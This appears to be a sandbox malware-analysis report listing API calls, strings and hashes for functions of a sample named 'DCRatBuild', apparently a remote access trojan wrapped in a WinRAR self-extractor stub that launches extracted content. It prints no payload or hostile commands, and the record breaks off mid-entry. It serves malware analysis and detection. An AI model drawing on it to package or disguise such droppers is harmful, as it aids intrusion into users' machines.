Function 0008DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00080863: GetModuleHandleW.KERNEL32(kernel32), ref: 0008087C
Part of subcall function 00080863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0008088E
Part of subcall function 00080863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000808BF

Part of subcall function 0008A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0008A655

Part of subcall function 0008AC16: OleInitialize.OLE32(00000000), ref: 0008AC2F
Part of subcall function 0008AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0008AC66
Part of subcall function 0008AC16: SHGetMalloc.SHELL32(000B8438), ref: 0008AC70

GetCommandLineW.KERNEL32 ref: 0008DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0008DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0008DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 0008DFCE

Part of subcall function 0008DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0008DBF4
Part of subcall function 0008DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0008DC30

CloseHandle.KERNEL32(00000000), ref: 0008DFD7
GetModuleFileNameW.KERNEL32(00000000,000CEC90,00000800), ref: 0008DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,000CEC90), ref: 0008DFFE
GetLocalTime.KERNEL32(?), ref: 0008E009
_swprintf.LIBCMT ref: 0008E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0008E05A
GetModuleHandleW.KERNEL32(00000000), ref: 0008E061
LoadIconW.USER32(00000000,00000064), ref: 0008E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0008E0C9
Sleep.KERNEL32(?), ref: 0008E0F7
DeleteObject.GDI32 ref: 0008E130
DeleteObject.GDI32(?), ref: 0008E140
CloseHandle.KERNEL32 ref: 0008E183

Strings

winrarsfxmappingfile.tmp, xrefs: 0008DF77
STARTDLG, xrefs: 0008E0BE
C:\Users\user\AppData\Local\Temp, xrefs: 0008DF33
sfxname, xrefs: 0008DFF9
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0008E039
sfxstime, xrefs: 0008E055

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-2198568351
Opcode ID: b9fc26e85469abfa79e9c8e35d33893b56ec12d9e6f5308fd168da19fad11e57
Instruction ID: 369a378f677e32a5043449b832ac83ac34235d1388478f921dbeb493d4437152
Opcode Fuzzy Hash: b9fc26e85469abfa79e9c8e35d33893b56ec12d9e6f5308fd168da19fad11e57
Instruction Fuzzy Hash: AE611671A04245AFE720BBB4DC59FBB77ECBB45700F04052AFA85921A2DB7C9D44CB62

Function 0008A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0008B73D,00000066), ref: 0008A6D5
SizeofResource.KERNEL32(00000000,?,?,?,0008B73D,00000066), ref: 0008A6EC
LoadResource.KERNEL32(00000000,?,?,?,0008B73D,00000066), ref: 0008A703
LockResource.KERNEL32(00000000,?,?,?,0008B73D,00000066), ref: 0008A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0008B73D,00000066), ref: 0008A72D
GlobalLock.KERNEL32(00000000), ref: 0008A73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0008A762
GlobalUnlock.KERNEL32(00000000), ref: 0008A7C6

Part of subcall function 0008A626: GdipAlloc.GDIPLUS(00000010), ref: 0008A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0008A7A7
GlobalFree.KERNEL32(00000000), ref: 0008A7CD

Strings

PNG, xrefs: 0008A6C6

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 45d0286075ed48cc9deb69ed94bf78698ecec6746cd2d8b8c68f9bba9812ebbc
Instruction ID: 75abc6384161cc984bf56d2cffdcd28b7a24bbc36073de36386ac03a90f655be
Opcode Fuzzy Hash: 45d0286075ed48cc9deb69ed94bf78698ecec6746cd2d8b8c68f9bba9812ebbc
Instruction Fuzzy Hash: 1E31B375604702AFF710AF61DC48D5BBBF8FF86760B10052AF94582621EB35DD40DBA1

Function 0007A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0007A592,000000FF,?,?), ref: 0007A6C4

Part of subcall function 0007BB03: _wcslen.LIBCMT ref: 0007BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0007A592,000000FF,?,?), ref: 0007A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0007A592,000000FF,?,?), ref: 0007A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,0007A592,000000FF,?,?), ref: 0007A728
GetLastError.KERNEL32(?,?,?,?,0007A592,000000FF,?,?), ref: 0007A734

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: a2a7fc5b9a4676f9c009033fcbb25360c78bc9a14752b8a6e6d7174b2bb891c0
Instruction ID: 6f9447e257df999593ed5d0a55f7825795a6189acfae72dd63d8a1a47ff828b5
Opcode Fuzzy Hash: a2a7fc5b9a4676f9c009033fcbb25360c78bc9a14752b8a6e6d7174b2bb891c0
Instruction Fuzzy Hash: DC418E72A00519ABCB29DF64CC84AEEB7B8FB89350F144196F55DE3200D7386E94CF94

Function 00097DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00097DC4,?,000AC300,0000000C,00097F1B,?,00000002,00000000), ref: 00097E0F
TerminateProcess.KERNEL32(00000000,?,00097DC4,?,000AC300,0000000C,00097F1B,?,00000002,00000000), ref: 00097E16
ExitProcess.KERNEL32 ref: 00097E28

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e46ec9b5a0dbed1a3dbdab8cb3e477c9e540881c8f85c3f4b9f8a73e062f976a
Instruction ID: 93171086a768c7138720e8801a07202c31643349fdacadf95c91865dfcebdd88
Opcode Fuzzy Hash: e46ec9b5a0dbed1a3dbdab8cb3e477c9e540881c8f85c3f4b9f8a73e062f976a
Instruction Fuzzy Hash: 60E04632014548AFDF02AF20DD4AA8A3FAAEB45341F004454F8098A132CB3AEE52EA80

Function 0007848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00078493

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a10988593b4acba303b6cc7667e8e718793cfbeeb644923a8f31cf88ca0b49bd
Instruction ID: f5022af902977c3b2f3e7d21458bc31bc650058e955b9149e8a92fb03214cf7a
Opcode Fuzzy Hash: a10988593b4acba303b6cc7667e8e718793cfbeeb644923a8f31cf88ca0b49bd
Instruction Fuzzy Hash: BA821870D44185AEDF65DB64C899BFABBF9AF05300F08C1B9E84D9B143DB385A84CB64

Function 00086CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c49be3c7bfcbff6dd856dc9824fe4d6f6fb9210d4c5e5e2cda98d82f595366dd
Instruction ID: 5ae16659bf0fe53b894fc1514218b5279363d7641f1050801e4e6a40f487913f
Opcode Fuzzy Hash: c49be3c7bfcbff6dd856dc9824fe4d6f6fb9210d4c5e5e2cda98d82f595366dd
Instruction Fuzzy Hash: 5CD1E5B1A083408FCB24EF28C84479BBBE1BF89308F19456DE9C99B346D775E905CB56

Function 0008B7E0 Relevance: 104.0, APIs: 48, Strings: 11, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0008B7E5

Part of subcall function 00071316: GetDlgItem.USER32(00000000,00003021), ref: 0007135A
Part of subcall function 00071316: SetWindowTextW.USER32(00000000,000A35F4), ref: 00071370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0008B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0008B8EF
IsDialogMessageW.USER32(?,?), ref: 0008B902
TranslateMessage.USER32(?), ref: 0008B910
DispatchMessageW.USER32(?), ref: 0008B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0008B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0008B960
GetDlgItem.USER32(?,00000068), ref: 0008B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0008B99E
SendMessageW.USER32(00000000,000000C2,00000000,000A35F4), ref: 0008B9B1

Part of subcall function 0008D453: _wcschr.LIBVCRUNTIME ref: 0008D45C
Part of subcall function 0008D453: _wcslen.LIBCMT ref: 0008D47D

SetFocus.USER32(00000000), ref: 0008B9B8
_swprintf.LIBCMT ref: 0008BA24

Part of subcall function 00074092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000740A5

Part of subcall function 0008D4D4: GetDlgItem.USER32(00000068,000CFCB8), ref: 0008D4E8
Part of subcall function 0008D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0008AF07,00000001,?,?,0008B7B9,000A506C,000CFCB8,000CFCB8,00001000,00000000,00000000), ref: 0008D510
Part of subcall function 0008D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0008D51B
Part of subcall function 0008D4D4: SendMessageW.USER32(00000000,000000C2,00000000,000A35F4), ref: 0008D529
Part of subcall function 0008D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0008D53F
Part of subcall function 0008D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0008D559
Part of subcall function 0008D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0008D59D
Part of subcall function 0008D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0008D5AB
Part of subcall function 0008D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0008D5BA
Part of subcall function 0008D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0008D5E1
Part of subcall function 0008D4D4: SendMessageW.USER32(00000000,000000C2,00000000,000A43F4), ref: 0008D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0008BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0008BA90
GetTickCount.KERNEL32 ref: 0008BAAE
_swprintf.LIBCMT ref: 0008BAC2
GetLastError.KERNEL32(?,00000011), ref: 0008BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0008BB43
_swprintf.LIBCMT ref: 0008BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0008BBD0
GetCommandLineW.KERNEL32 ref: 0008BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0008BC47
ShellExecuteExW.SHELL32(0000003C), ref: 0008BC6F
Sleep.KERNEL32(00000064), ref: 0008BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0008BCE2
CloseHandle.KERNEL32(00000000), ref: 0008BCEB
_swprintf.LIBCMT ref: 0008BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0008BD7D
SetDlgItemTextW.USER32(?,00000065,000A35F4), ref: 0008BD94
GetDlgItem.USER32(?,00000065), ref: 0008BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 0008BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0008BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0008BE68
_wcslen.LIBCMT ref: 0008BEBE
_swprintf.LIBCMT ref: 0008BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 0008BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0008BF4C
GetDlgItem.USER32(?,00000068), ref: 0008BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0008BF6B
GetDlgItem.USER32(?,00000066), ref: 0008BF85
SetWindowTextW.USER32(00000000,000BA472), ref: 0008BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0008C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0008C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0008C0BD
EnableWindow.USER32(00000000,00000000), ref: 0008C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0008C1D9

Part of subcall function 0008C73F: __EH_prolog.LIBCMT ref: 0008C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0008C1FD

Strings

winrarsfxmappingfile.tmp, xrefs: 0008BBA6
LICENSEDLG, xrefs: 0008C0B2
<, xrefs: 0008BB84
Q, xrefs: 0008BBBC
STARTDLG, xrefs: 0008B801
__tmp_rar_sfx_access_check_%u, xrefs: 0008BAB5
-el -s2 "-d%s" "-sp%s", xrefs: 0008BB6B
"%s"%s, xrefs: 0008BD0D
%s, xrefs: 0008BED8
C:\Users\user\AppData\Local\Temp, xrefs: 0008BBC9
@, xrefs: 0008BB91

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp$Q
API String ID: 3829768659-4128478570
Opcode ID: 10facadc762fea7d019a399b370045df300890a7c8966fa7591bb3111aeacfdf
Instruction ID: 238b616ce4880d8605a751f7392c2263da450830978abec42bdc125fb57873d3
Opcode Fuzzy Hash: 10facadc762fea7d019a399b370045df300890a7c8966fa7591bb3111aeacfdf
Instruction Fuzzy Hash: FE42A571944249BAFB21AB64DC4AFFE7BBCBB02700F044155F684A61E3CB795A44CB26

Function 00080863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 0008087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0008088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000808BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00080B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00080B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00080B93
ReadFile.KERNEL32(00000000,?,00007FFE,|<,00000000), ref: 00080BB1
CloseHandle.KERNEL32(00000000), ref: 00080C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00080C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<,?,00000000,?,00000800), ref: 00080C72
GetFileAttributesW.KERNELBASE(?,?,|<,00000800,?,00000000,?,00000800), ref: 00080C9C
GetFileAttributesW.KERNEL32(?,?,D=,00000800), ref: 00080CD8

Part of subcall function 0008081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00080836
Part of subcall function 0008081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0007F2D8,Crypt32.dll,00000000,0007F35C,?,?,0007F33E,?,?,?), ref: 00080858

_swprintf.LIBCMT ref: 00080D4A
_swprintf.LIBCMT ref: 00080D96

Part of subcall function 00074092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000740A5

AllocConsole.KERNEL32 ref: 00080D9E
GetCurrentProcessId.KERNEL32 ref: 00080DA8
AttachConsole.KERNEL32(00000000), ref: 00080DAF
_wcslen.LIBCMT ref: 00080DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00080DD5
WriteConsoleW.KERNEL32(00000000), ref: 00080DDC
Sleep.KERNEL32(00002710), ref: 00080DE7
FreeConsole.KERNEL32 ref: 00080DED
ExitProcess.KERNEL32 ref: 00080DF5

Strings

|<, xrefs: 00080B9E, 00080BA2
h>, xrefs: 0008099F
uxtheme.dll, xrefs: 00080D17
h=, xrefs: 00080947
0?, xrefs: 000809E8
A, xrefs: 00080B1C
`@, xrefs: 00080A6C
?, xrefs: 00080A35
0A, xrefs: 00080ACF
T=, xrefs: 0008093F
(=, xrefs: 0008092F
P>, xrefs: 00080997
,@, xrefs: 00080A56
<, xrefs: 00080917
H?, xrefs: 000809F3
,<, xrefs: 000808E7
4B, xrefs: 00080B3D
>, xrefs: 000809C7
H@, xrefs: 00080A61
|@, xrefs: 00080A77
HA, xrefs: 00080ADA
DXGIDebug.dll, xrefs: 000808FC, 00080C5E
|?, xrefs: 00080A09
dA, xrefs: 00080AE5
@, xrefs: 00080AAE
kernel32, xrefs: 00080873
SetDllDirectoryW, xrefs: 00080888
SetDefaultDllDirectories, xrefs: 000808B9
D=, xrefs: 00080CB9, 00080CC9
d?, xrefs: 000809FE
dwmapi.dll, xrefs: 00080927, 00080D0D
8>, xrefs: 0008098F
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00080D84

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: (=$,<$,@$0?$0A$4B$8>$D=$DXGIDebug.dll$H?$H@$HA$P>$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=$`@$d?$dA$dwmapi.dll$h=$h>$kernel32$uxtheme.dll$|<$|?$|@$<$>$?$@$A
API String ID: 1207345701-3925750482
Opcode ID: b3cf1da276939d0c1813996ec86cf9811b1f527649f68d26aec11eda783b8337
Instruction ID: 28b7b0a809482a30c1114fc51d5558b4cb4ca122600085840d11c6523ed3c5f4
Opcode Fuzzy Hash: b3cf1da276939d0c1813996ec86cf9811b1f527649f68d26aec11eda783b8337
Instruction Fuzzy Hash: FAD161B1408384AFD360EF90D849FDFBAE8BB86704F50491DF2C996151CBB88649CB92

Function 0008C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0008C744

Part of subcall function 0008B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0008B3FB

Part of subcall function 0008AF98: _wcschr.LIBVCRUNTIME ref: 0008B033

_wcslen.LIBCMT ref: 0008CA0A
_wcslen.LIBCMT ref: 0008CA13
SetWindowTextW.USER32(?,?), ref: 0008CA71
_wcslen.LIBCMT ref: 0008CAB3
_wcsrchr.LIBVCRUNTIME ref: 0008CBFB
GetDlgItem.USER32(?,00000066), ref: 0008CC36
SetWindowTextW.USER32(00000000,?), ref: 0008CC46
SendMessageW.USER32(00000000,00000143,00000000,000BA472), ref: 0008CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0008CC7F

Strings

ProgramFilesDir, xrefs: 0008CB45
<br>, xrefs: 0008C9D4
%s.%d.tmp, xrefs: 0008C940
Software\Microsoft\Windows\CurrentVersion, xrefs: 0008CB1A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 986293930-312220925
Opcode ID: cab5caac193b1811427c5c2a92d8ff15b3ff566d5a4a33faa95d6d76f64ab6e2
Instruction ID: fff6ffd6d3e57ab18334c2fe4a9a6374b2facda77dcb7bb9c63a82fda44d7ef0
Opcode Fuzzy Hash: cab5caac193b1811427c5c2a92d8ff15b3ff566d5a4a33faa95d6d76f64ab6e2
Instruction Fuzzy Hash: A1E14472900119AAEF25EBA0DD85EEE73BCBB05350F4441A6F689E7081EB749F448F71

Function 0007DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0007DA70
_wcschr.LIBVCRUNTIME ref: 0007DA91
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0007DAAC

Part of subcall function 0007C29A: _wcslen.LIBCMT ref: 0007C2A2

Part of subcall function 000805DA: _wcslen.LIBCMT ref: 000805E0

Part of subcall function 00081B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0007BAE9,00000000,?,?,?,000103F6), ref: 00081BA0

_wcslen.LIBCMT ref: 0007DDE9
__fprintf_l.LIBCMT ref: 0007DF1C

Strings

R, xrefs: 0007DC0C
@%s:, xrefs: 0007DF06, 0007DF12
RTL, xrefs: 0007DEDE
$%s:, xrefs: 0007DEFF
,, xrefs: 0007DF57
9, xrefs: 0007DDD0
, xrefs: 0007DD6C
*messages***, xrefs: 0007DBC1
*messages***, xrefs: 0007DBFA
a, xrefs: 0007DC16

Memory Dump Source

